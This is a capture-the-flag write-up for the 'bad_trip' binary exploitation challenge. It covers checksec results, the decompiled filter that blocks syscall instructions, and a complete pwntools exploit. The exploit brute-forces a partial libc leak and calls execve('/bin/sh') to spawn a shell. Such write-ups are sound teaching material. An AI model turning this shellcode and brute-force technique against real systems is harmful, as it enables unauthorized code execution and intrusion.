Description
This challenge is a follow up for the challenge Good_trip, it’s just a little more challenging.
Analysis
ELF Binary Information
The binary good_trip is identified as follows:
./bad_trip: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9d2ca42d57283a1a9ce7b
2c1b19c5265c2b20826, for GNU/Linux 4.4.0, not stripped
This indicates:
- Type: ELF 64-bit LSB executable
- Architecture: x86-64
- Version: SYSV
- Linking: Dynamically linked
- Interpreter: /lib64/ld-linux-x86-64.so.2
- Build ID: 9d2ca42d57283a1a9ce7b2c1b19c5265c2b20826
- Target OS: GNU/Linux 4.4.0
- Stripping: Not stripped (contains symbol table and debugging information)
Security Analysis with checksec
Using the checksec tool, we analyze the security features enabled in the binary:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Unlike the previous challenge, this binary is built with full RELRO protection, a stack canary for buffer overflow defense, NX enabled to prevent execution from non-executable memory regions, and PIE enabled for randomized address loading.
Decompilation of main Function
The decompiled main function from Ghidra reveals the binary’s process flow. It starts by initializing certain parameters, then allocates a memory region called code using mmap. The program leaks the first 4 bytes of the address of puts, then prompts the user for input with a message, reads up to 0x999 bytes from stdin, and stores them in the code variable. After that, it marks the code memory region as read-only and executable using mprotect. Subsequently, the filter function is called to perform certain checks, and finally, the instructions stored in code are executed using exec:
undefined8 main(EVP_PKEY_CTX *param_1)
{
init(param_1);
code = mmap((void *)0x1337131369,0x1000,7,0x22,-1,0);
mmap((void *)0x6969696969,0x21000,3,0x22,-1,0);
printf("here ill give you something to start with %p\n",puts);
printf("code >> ");
read(0,code,0x999);
mprotect(code,0x1000,5);
filter();
exec(code);
return 0;
}
Decompilation of filter Function
The filter function decompiled in Ghidra:
undefined8 filter(void)
{
int iVar1;
long in_FS_OFFSET;
int j;
int i;
undefined *local_28 [3];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
j = -1;
local_28[0] = &DAT_00102020; // "\x0f\x05\x00" : syscall
local_28[1] = &DAT_00102023; // "\x0f\x34\x00" : sysenter
local_28[2] = &DAT_00102026; // "\xcd\x80\x00" : int 0x80
while (j = j + 1, j < 0xfff) {
i = -1;
while (i = i + 1, i < 3) {
iVar1 = memcmp(local_28[i],(void *)(code + j),2);
if (iVar1 == 0) {
puts("nop, not happening.");
/* WARNING: Subroutine does not return */
exit(-1);
}
}
}
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
The filter function checks if the provided code contains specific syscall instructions:
- Syscall:
"\x0f\x05\x00" - Sysenter:
"\x0f\x34\x00" - Int 0x80:
"\xcd\x80\x00"
If any of these instructions are found, the function terminates the program by exiting with an exit code of -1, otherwise it returns 0.
Disassembly of exec Function
The exec function disassembly shows:
Dump of assembler code for function exec:
0x00000000000011df <+0>: push rbp
0x00000000000011e0 <+1>: mov rbp,rsp
0x00000000000011e3 <+4>: mov QWORD PTR [rbp-0x8],rdi
0x00000000000011e7 <+8>: mov rbx,0x0
0x00000000000011ee <+15>: mov r15,0x0
0x00000000000011f5 <+22>: mov r14,0x0
0x00000000000011fc <+29>: mov r9,0x0
0x0000000000001203 <+36>: mov r8,0x0
0x000000000000120a <+43>: mov r11,0x0
0x0000000000001211 <+50>: mov r12,0x0
0x0000000000001218 <+57>: mov rsp,0x0
0x000000000000121f <+64>: mov rbp,0x0
0x0000000000001226 <+71>: jmp rdi
0x0000000000001228 <+73>: nop
0x0000000000001229 <+74>: pop rbp
0x000000000000122a <+75>: ret
End of assembler dump.This code clears some registers and then jumps to the user provided code, it’s worth noting that it doesn’t clear all the registers, so it’s possible to get a leak from the uncleared ones.
Solution
NOTE
There are different ways to solve this challenge. The intended solution was to read the libc address from other registers that were not cleared. My solution wasn’t the most efficient, but it still worked and helped me get the flag. It’s always interesting to explore and discover various solutions to a problem, even when they’re not optimal.
The approach I used, was to leverage the leaked four bytes of the puts address, and as I observed a consistent pattern in the Docker container: the missing part of the libc address was always 0x00007fXX, where XX represents a changing byte. Essentially, I created a shellcode that bruteforces this byte. I fixed one byte on my side and repeatedly ran the program. If the byte didn’t match, the program would crash, but after enough attempts, it would eventually align with our specified byte in its address. Once this alignment occurred, we would gain access to a shell.
Shellcode
First let’s setup the stack, using the previous mapped region:
mov rsp, 0x6969696100;
mov rbp, 0x6969696120
mov rsi, 0;
mov rdx, 0;Then let’s call execve to gain a shell:
mov rdi, BINSH_ADDRESS;
mov r11, EXECVE_ADDRESS;
call r11;Script Implementation
We’ll define a random byte b and then calculate libc address from the leak:
libc_address = (0x7f_00_00000000 + (b << 32) + leak) - libc.sym['puts']We’ll use pwntools’s asm function to compile the assembly code:
payload_header = asm(f'''
mov rsp, 0x6969696100;
mov rbp, 0x6969696120
mov rsi, 0;
mov rdx, 0;
''')Since we’re bruteforcing libc address, we need to keep generating the second part of the payload, for that let’s define a function:
def generate_payload_body(base):
return asm(f'''
mov rdi, {hex(base + binsh)};
mov r11, {hex(base + libc.sym["execve"])};
call r11;''')And here’s our infinite loop, that keeps running the program until we get a response that indicates that we got shell:
while True:
io = start()
leak = int(io.readline().strip().split(b' ')[-1], 16)
libc_address = (0x7f_00_00000000 + (b << 32) + leak) - libc.sym['puts']
payload = payload_header + generate_payload_body(libc_address)
io.readuntil(b">>")
io.sendline(payload)
io.clean()
io.sendline(b'echo hello there, it is working')
try:
if len(io.recvuntil(b'working', timeout=1)) > 3:
break
except EOFError:
pass
io.close()It took more than a 100 attempts, but eventually we got the flag:
AKASEC{pr3f37CH3M_Li8C_4Ddr35532}
Full Script
from pwn import *
from random import randint
import logging
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
gdbscript = '''
init-pwndbg
'''.format(**locals())
exe = './bad_trip'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'warn'
libc = ELF("./libc.so.6", checksec=False)
binsh = next(libc.search(b"/bin/sh\x00"))
payload_header = asm(f'''
mov rsp, 0x6969696100;
mov rbp, 0x6969696120
mov rsi, 0;
mov rdx, 0;
''')
def generate_payload_body(base):
return asm(f'''
mov rdi, {hex(base + binsh)};
mov r11, {hex(base + libc.sym["execve"])};
call r11;''')
with log.progress('Tries', level=logging.WARN) as progress, \
log.progress('Current libc address', level=logging.WARN) as libc_address_progress:
tries = 0
b = 0x49 # selected random byte
while True:
io = start()
progress.status(tries)
tries += 1
leak = int(io.readline().strip().split(b' ')[-1], 16)
libc_address = (0x7f_00_00000000 + (b << 32) + leak) - libc.sym['puts']
libc_address_progress.status(hex(libc_address))
payload = payload_header + generate_payload_body(libc_address)
io.readuntil(b">>")
io.sendline(payload)
io.clean()
io.sendline(b'echo hello there, it is working')
try:
if len(io.recvuntil(b'working', timeout=1)) > 3:
break
except EOFError:
pass
io.close()
io.sendline(b"cat flag.txt")
result = io.clean()
if b'akasec' in result.lower() and b'}' in result:
print('-'*30)
print(f'Found flag: {result[:result.index(b"}")+1].decode()}')
io.interactive()